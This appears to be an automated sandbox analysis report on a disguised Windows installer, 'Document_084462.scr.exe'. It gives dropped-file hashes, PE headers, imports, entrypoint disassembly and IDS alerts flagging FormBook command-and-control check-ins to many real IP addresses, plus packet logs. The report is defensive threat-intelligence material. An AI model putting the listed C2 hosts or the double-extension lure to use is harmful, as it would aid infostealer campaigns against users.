                                                                            Preview:............(..............--......LL............dd......?.$.)...............S....6..)..MMM.[[.............$....6............)...............................b..Y....T.^^^...........L......................(....&............./.........j..............-..++.XXXX.....O..........................F...........................................#####....1..........5555.zz......22......QQ.......HH....EEEEEE......h.......eeeee..........0...{..PP.......:.{{.z..0..w.v..cccc.PP............................................................F.;;.......YYY.........1....77.......xxxxxx.........pp.jj.....""""...............c.``````.mmmmmmmm...............W.......................KK..................<......3.........t........55...............88..........xx.......................=...m............e....."....H...ooo...........U...............====..M....j..............6......K....................____.RRR..............................33333........eee..m.........---.............h........=.X.....G.[.....................

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Sulfoforbindelserne.chl

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):116773
                                                                            Entropy (8bit):1.2617404262864118
                                                                            Encrypted:false
                                                                            SSDEEP:768:4yTqkjNz46YyMqMTGZGi7vk59sktCQ3am6ZRN8rOFlS70dhEr:0avCLJ
                                                                            MD5:753C4F9B2F84095556E2C65E2569D814
                                                                            SHA1:3F878C44B311B8C34B2A6E09F49324D42FAD1437
                                                                            SHA-256:E6DCE06287ACEBCFB23DA58EAC6AAA36E253BADB493125F47E801B99C4E48B25
                                                                            SHA-512:8C19F357F4A59D5CB493F418C82B0D06ECED25EC9D05E9B1CFF943A6A79232DC6B2EBC3552B0BFBA76018A7FCEFE8A0410ADEE739151640F149884A4FC3DF651
                                                                            Malicious:false
                                                                            Preview:..................................................V...................Y..Y................................................................................................................M.......................................................................................*.......................`...............................................A................D....D....................................................."................................................l.............\.....%....:......*.......................................................................................c.....M........?......................5........G...................................................U.........................................................................5.8...s................[.....m.....{...........................)$..................................................lm.....................................................}................................................................

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Umpiress240.biv

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):222131
                                                                            Entropy (8bit):1.2548431305039245
                                                                            Encrypted:false
                                                                            SSDEEP:768:I2mmH3AhfHp+POGgRSRFZHl2bxYLbBjJ4tFGZjDyYqIx3x9+6yiKk+vlK5u5DF+G:UoNwkuoHtyiKJlQVD
                                                                            MD5:C018B5D87F38B0DBA90AFE75F72B6798
                                                                            SHA1:9B43AE84826B712BB8152D70D2D7B929DB5CE3E2
                                                                            SHA-256:323B7D5F0C7A4F9FA87D8F6DD9A18E81F4284C31DA4FDD5FFE7022501445FD1C
                                                                            SHA-512:D4D6A99EBA1F594BA4052F4C83C93946749EE7524D5765CFD67C0CD34BBA3F1ABBDEA259EBE155A3767898AAE806E29E42BE6539C4A2DC067730EC6D9655ECD5
                                                                            Malicious:false
                                                                            Preview:.....................................%..................................................................................................................L....B..............................I...........]...........i.........A............\............................................................................................................................................................................................&..............s............................................................................(........].........................................................................,..............]...............F..............G....+..............................................F..............9...........,........i.............................................................................................h...k........................Y......k..........................................................U..........R..................................C...........e..................

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\potmaker.sti

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):477418
                                                                            Entropy (8bit):1.2516735777117096
                                                                            Encrypted:false
                                                                            SSDEEP:1536:BugSY71rrh1lxz0ZSyCjm0eydI6Vl73+ByRgN:F7Zrh4SvQy3SBGgN
                                                                            MD5:B86B0A4CFA46775BAEEE023CCECA54E1
                                                                            SHA1:16BABC347EBFC80762D73A12FF39E5ADE55EC7DB
                                                                            SHA-256:7B1E45A0398C8428C6CF476DAE264102A842FACC20930B57688960046FF087F6
                                                                            SHA-512:42787A7037E7D117D82AF3580306C7C10854B279CEC0B38956217B4E04222B34EAC50763B0DB850454DC0AA43B5238297D39FC8E5A681C805966E0BCCD4E7C0D
                                                                            Malicious:false
                                                                            Preview:.................................E..............................................................................................................................F......................................./..............#...........n...t..>..........]...............".................|................................4...........s...z......................................................................................U......................................................................J...............................................................j......................-......."...._..............;.............X........................3.H....................................P........#...............L.....................................,......................................R........&..............................................................................................................`<.....f......E..al.....................S..........................................V..............

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Entropy (8bit):7.959977071883598
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:Document_084462.scr.exe
                                                                            File size:456'022 bytes
                                                                            MD5:b4e362177a0e0836dd04831fe456255b
                                                                            SHA1:de7a47519e45386fd0b0f2ff4ab6fbdb5b81716e
                                                                            SHA256:0ccf347c204f022f6cf118c653ccb248e41cfc71593217b9ed5bfc7ef13fcbc7
                                                                            SHA512:fd3cb279c3211260afaffd7e1976231456fbd00cbec0bab95204740b64fc499d059688d609495bd6a87cd8df3fab9f9c8ddcf13c67b83e1ea38414080e8dc749
                                                                            SSDEEP:6144:B3hqLBhFuob3eN4CXo9l4z97QqPwTvOw+7P+cf1rr6USu1DG1FM1MYNTXW:B3UXhb0WlO97QqP0Odmcf1KUS0zT
                                                                            TLSH:98A423C55140333BC9A61F34A4393715EFACCD213814A35B9B54FB4C667B682AB4A7A3
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L......`.................f....:....

                                                                            File Icon

                                                                            Icon Hash:3d2e0f95332b3399

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4034a2
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:6e7f9a29f2c85394521a08b9f31f6275

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            sub esp, 000002D4h
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            push 00000020h
                                                                            pop edi
                                                                            xor ebx, ebx
                                                                            push 00008001h
                                                                            mov dword ptr [esp+14h], ebx
                                                                            mov dword ptr [esp+10h], 0040A2E0h
                                                                            mov dword ptr [esp+1Ch], ebx
                                                                            call dword ptr [004080CCh]
                                                                            call dword ptr [004080D0h]
                                                                            and eax, BFFFFFFFh
                                                                            cmp ax, 00000006h
                                                                            mov dword ptr [007A8A6Ch], eax
                                                                            je 00007F54F1010C93h
                                                                            push ebx
                                                                            call 00007F54F1013F81h
                                                                            cmp eax, ebx
                                                                            je 00007F54F1010C89h
                                                                            push 00000C00h
                                                                            call eax
                                                                            mov esi, 004082B0h
                                                                            push esi
                                                                            call 00007F54F1013EFBh
                                                                            push esi
                                                                            call dword ptr [00408154h]
                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                            cmp byte ptr [esi], 00000000h
                                                                            jne 00007F54F1010C6Ch
                                                                            push 0000000Bh
                                                                            call 00007F54F1013F54h
                                                                            push 00000009h
                                                                            call 00007F54F1013F4Dh
                                                                            push 00000007h
                                                                            mov dword ptr [007A8A64h], eax
                                                                            call 00007F54F1013F41h
                                                                            cmp eax, ebx
                                                                            je 00007F54F1010C91h
                                                                            push 0000001Eh
                                                                            call eax
                                                                            test eax, eax
                                                                            je 00007F54F1010C89h
                                                                            or byte ptr [007A8A6Fh], 00000040h
                                                                            push ebp
                                                                            call dword ptr [00408038h]
                                                                            push ebx
                                                                            call dword ptr [00408298h]
                                                                            mov dword ptr [007A8B38h], eax
                                                                            push ebx
                                                                            lea eax, dword ptr [esp+34h]
                                                                            push 000002B4h
                                                                            push eax
                                                                            push ebx
                                                                            push 0079FF08h
                                                                            call dword ptr [0040818Ch]
                                                                            push 0040A2C8h

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c70000xb48.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x656c0x660012117ad2476c7a7912407af0dcfcb8a7False0.6737515318627451data6.47208759712619IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x80000x13980x1400e3e8d62e1d2308b175349eb9daa266c8False0.4494140625data5.137750894959169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0xa0000x39eb780x6002020ca26e010546720fd467c5d087b57unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .ndata0x3a90000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x3c70000xb480xc0013d9a87cc14830e1f01c641a62386bbeFalse0.4215494791666667data4.357284806500026IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0x3c71c00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                            RT_DIALOG0x3c74a80x100dataEnglishUnited States0.5234375
                                                                            RT_DIALOG0x3c75a80x11cdataEnglishUnited States0.6056338028169014
                                                                            RT_DIALOG0x3c76c80xc4dataEnglishUnited States0.5918367346938775
                                                                            RT_DIALOG0x3c77900x60dataEnglishUnited States0.7291666666666666
                                                                            RT_GROUP_ICON0x3c77f00x14dataEnglishUnited States1.2
                                                                            RT_MANIFEST0x3c78080x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                            Imports

                                                                            DLLImport
                                                                            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-03T18:53:21.836127+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049784208.91.197.3980TCP
                                                                            2024-12-03T18:53:21.836127+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980913.248.169.4880TCP
                                                                            2024-12-03T18:53:21.836127+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049782208.91.197.3980TCP
                                                                            2024-12-03T18:53:21.836127+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975213.248.169.4880TCP
                                                                            2024-12-03T18:53:21.836127+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049783208.91.197.3980TCP
                                                                            2024-12-03T18:54:21.165696+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049748122.201.127.17443TCP
                                                                            2024-12-03T18:54:55.670483+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049749202.92.5.2380TCP
                                                                            2024-12-03T18:55:11.191718+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975013.248.169.4880TCP
                                                                            2024-12-03T18:55:13.870410+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975113.248.169.4880TCP
                                                                            2024-12-03T18:55:19.257391+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204975313.248.169.4880TCP
                                                                            2024-12-03T18:55:24.857076+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049754209.74.77.10980TCP
                                                                            2024-12-03T18:55:27.571982+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049755209.74.77.10980TCP
                                                                            2024-12-03T18:55:30.291099+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049756209.74.77.10980TCP
                                                                            2024-12-03T18:55:33.005769+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049757209.74.77.10980TCP
                                                                            2024-12-03T18:55:39.662480+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975823.225.159.4280TCP
                                                                            2024-12-03T18:55:42.376534+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975923.225.159.4280TCP
                                                                            2024-12-03T18:55:45.089734+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976023.225.159.4280TCP
                                                                            2024-12-03T18:55:47.811594+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204976123.225.159.4280TCP
                                                                            2024-12-03T18:55:53.682677+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976246.30.211.3880TCP
                                                                            2024-12-03T18:55:56.455161+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976346.30.211.3880TCP
                                                                            2024-12-03T18:55:59.251794+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976446.30.211.3880TCP
                                                                            2024-12-03T18:56:02.000340+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204976546.30.211.3880TCP
                                                                            2024-12-03T18:56:07.844275+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049766103.224.182.24280TCP
                                                                            2024-12-03T18:56:10.568828+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049767103.224.182.24280TCP
                                                                            2024-12-03T18:56:13.278283+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049768103.224.182.24280TCP
                                                                            2024-12-03T18:56:15.996802+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049769103.224.182.24280TCP
                                                                            2024-12-03T18:56:22.625733+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049770149.88.81.19080TCP
                                                                            2024-12-03T18:56:25.510004+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049771149.88.81.19080TCP
                                                                            2024-12-03T18:56:28.381371+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049772149.88.81.19080TCP
                                                                            2024-12-03T18:56:31.244538+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049773149.88.81.19080TCP
                                                                            2024-12-03T18:56:37.627041+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049774101.35.209.18380TCP
                                                                            2024-12-03T18:56:40.509997+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049775101.35.209.18380TCP
                                                                            2024-12-03T18:56:43.383184+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049776101.35.209.18380TCP
                                                                            2024-12-03T18:56:46.253918+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049777101.35.209.18380TCP
                                                                            2024-12-03T18:56:52.441476+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977838.47.232.20280TCP
                                                                            2024-12-03T18:56:55.327382+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977938.47.232.20280TCP
                                                                            2024-12-03T18:56:58.207171+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978038.47.232.20280TCP
                                                                            2024-12-03T18:57:01.088425+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204978138.47.232.20280TCP
                                                                            2024-12-03T18:57:16.592863+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049785208.91.197.3980TCP
                                                                            2024-12-03T18:57:22.567725+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978643.205.198.2980TCP
                                                                            2024-12-03T18:57:25.456160+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978743.205.198.2980TCP
                                                                            2024-12-03T18:57:28.330391+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978843.205.198.2980TCP
                                                                            2024-12-03T18:57:31.221665+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204978943.205.198.2980TCP
                                                                            2024-12-03T18:57:37.500189+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049790172.67.187.11480TCP
                                                                            2024-12-03T18:57:40.298583+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049791172.67.187.11480TCP
                                                                            2024-12-03T18:57:42.724317+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049792172.67.187.11480TCP
                                                                            2024-12-03T18:57:45.450379+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049793172.67.187.11480TCP
                                                                            2024-12-03T18:57:51.285622+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049794104.21.57.24880TCP
                                                                            2024-12-03T18:57:53.924561+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049795104.21.57.24880TCP
                                                                            2024-12-03T18:57:56.613863+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049796104.21.57.24880TCP
                                                                            2024-12-03T18:57:59.221096+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049797104.21.57.24880TCP
                                                                            2024-12-03T18:58:04.994520+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979874.48.143.8280TCP
                                                                            2024-12-03T18:58:07.692391+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979974.48.143.8280TCP
                                                                            2024-12-03T18:58:10.401521+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980074.48.143.8280TCP
                                                                            2024-12-03T18:58:13.120261+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204980174.48.143.8280TCP
                                                                            2024-12-03T18:58:19.413589+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049802134.0.14.15880TCP
                                                                            2024-12-03T18:58:22.145021+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049803134.0.14.15880TCP
                                                                            2024-12-03T18:58:24.919629+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049804134.0.14.15880TCP
                                                                            2024-12-03T18:58:27.649504+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049805134.0.14.15880TCP
                                                                            2024-12-03T18:58:44.822680+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049806202.92.5.2380TCP
                                                                            2024-12-03T18:58:50.141283+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980713.248.169.4880TCP
                                                                            2024-12-03T18:58:52.821550+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980813.248.169.4880TCP
                                                                            2024-12-03T18:58:58.206606+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981013.248.169.4880TCP
                                                                            2024-12-03T18:59:03.599772+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049811209.74.77.10980TCP
                                                                            2024-12-03T18:59:06.317034+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049812209.74.77.10980TCP
                                                                            2024-12-03T18:59:09.041640+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049813209.74.77.10980TCP
                                                                            2024-12-03T18:59:11.753182+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049814209.74.77.10980TCP
                                                                            2024-12-03T18:59:17.325482+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981523.225.159.4280TCP
                                                                            2024-12-03T18:59:20.046254+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981623.225.159.4280TCP
                                                                            2024-12-03T18:59:22.765576+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981723.225.159.4280TCP
                                                                            2024-12-03T18:59:25.482700+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981823.225.159.4280TCP
                                                                            2024-12-03T18:59:30.998158+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981946.30.211.3880TCP
                                                                            2024-12-03T18:59:33.749854+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982046.30.211.3880TCP
                                                                            2024-12-03T18:59:36.548323+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982146.30.211.3880TCP
                                                                            2024-12-03T18:59:39.298041+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204982246.30.211.3880TCP
                                                                            2024-12-03T18:59:44.713906+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049823103.224.182.24280TCP
                                                                            2024-12-03T18:59:47.417194+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049824103.224.182.24280TCP
                                                                            2024-12-03T18:59:50.135369+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049825103.224.182.24280TCP
                                                                            2024-12-03T18:59:52.856997+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049826103.224.182.24280TCP
                                                                            2024-12-03T18:59:58.551125+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049827149.88.81.19080TCP
                                                                            2024-12-03T19:00:01.416649+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049828149.88.81.19080TCP
                                                                            2024-12-03T19:00:04.296824+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049829149.88.81.19080TCP
                                                                            2024-12-03T19:00:07.185737+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049830149.88.81.19080TCP
                                                                            2024-12-03T19:00:12.886351+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049831101.35.209.18380TCP
                                                                            2024-12-03T19:00:15.740889+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049832101.35.209.18380TCP
                                                                            2024-12-03T19:00:18.603530+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049833101.35.209.18380TCP
                                                                            2024-12-03T19:00:21.476589+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049834101.35.209.18380TCP
                                                                            2024-12-03T19:00:27.215292+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983538.47.232.20280TCP
                                                                            2024-12-03T19:00:30.112224+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983638.47.232.20280TCP
                                                                            2024-12-03T19:00:32.958544+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983738.47.232.20280TCP
                                                                            2024-12-03T19:00:35.826457+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983838.47.232.20280TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 3, 2024 18:54:19.814423084 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:19.814536095 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:19.814719915 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:19.828243971 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:19.828267097 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:20.509423971 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:20.509618044 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:20.552366972 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:20.552378893 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:20.552710056 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:20.552973032 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:20.556202888 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:20.602227926 CET44349748122.201.127.17192.168.11.20
